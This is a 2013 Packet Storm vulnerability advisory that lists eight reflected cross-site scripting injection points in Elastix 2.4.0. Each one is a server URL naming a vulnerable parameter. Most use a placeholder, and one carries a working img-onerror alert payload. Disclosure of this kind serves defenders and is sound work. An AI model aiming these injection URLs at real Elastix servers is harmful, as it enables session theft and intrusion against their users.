Elastix 2.4.0 Cross Site Scripting

2013-11-17T00:00:00
ID PACKETSTORM:124045
Type packetstorm
Reporter Bassem
Modified 2013-11-17T00:00:00

Description

                                        
                                            `# Exploit Title: Elastix 2.4.0 Multiple XSS  
# Date: [ 17 Nov 2013 ]  
# Author: Bassem - Unshield Team  
# Contact: Security[at]unshield[dot]net  
# Software Link: [http://www.elastix.org/]  
# Version: 2.4.0 , works for same libs exist also on Elastix 3.0.0 Alpha   
# Tested on: 2.4.0  
  
1)http://elastix-server/libs/magpierss/scripts/magpie_debug.php?url=[XSS]  
2)http://elastix-server/libs/magpierss/scripts/magpie_slashbox.php?rss_url=[XSS]  
3)http://elastix-server/panel/flash/mypage.php?clid=[XSS]  
4)http://elastix-server/panel/flash/mypage.php?clid=0&clidname=[base64(XSS)]  
5)http://elastix-server/recordings/index.php?login='>[XSS]  
6)http://elastix-server/libs/jpgraph/Examples/show-image.php?target="><IMg+srC%3D+x+OnerRoR+%3D+alert(0)>  
7)http://elastix-server/vtigercrm/modules/Mobile/index.php?_operation=[XSS]  
8)http://elastix-server/vtigercrm/vtigerservice.php?service=[XSS]  
  
Regards/Cordialement  
UNSHIELD TEAM  
`